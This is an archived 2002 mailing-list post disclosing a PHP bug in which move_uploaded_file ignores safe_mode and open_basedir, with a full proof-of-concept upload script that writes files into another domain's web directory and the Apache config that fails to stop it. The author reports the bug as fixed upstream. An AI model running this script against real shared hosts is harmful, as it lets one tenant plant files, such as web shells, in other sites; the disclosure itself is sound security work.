Hey
Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.
You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )
<?
$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];
$size_limit = "100000"; // set size limit in bytes
if ($file){
if ($size < $size_limit){
move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}
echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>
As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.
Virtualhost configuration snippet:
<VirtualHost IP_HERE>
DocumentRoot /domains/whatever.com/public_html/root/
ServerName root.whatever.com
CustomLog /domains/whatever.com/logs/access_log combined
ErrorLog /domains/whatever.com/logs/error_log
php_admin_value safe_mode 1
php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>
As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.
PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.
Bye,
Tozz
This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:34:48 PST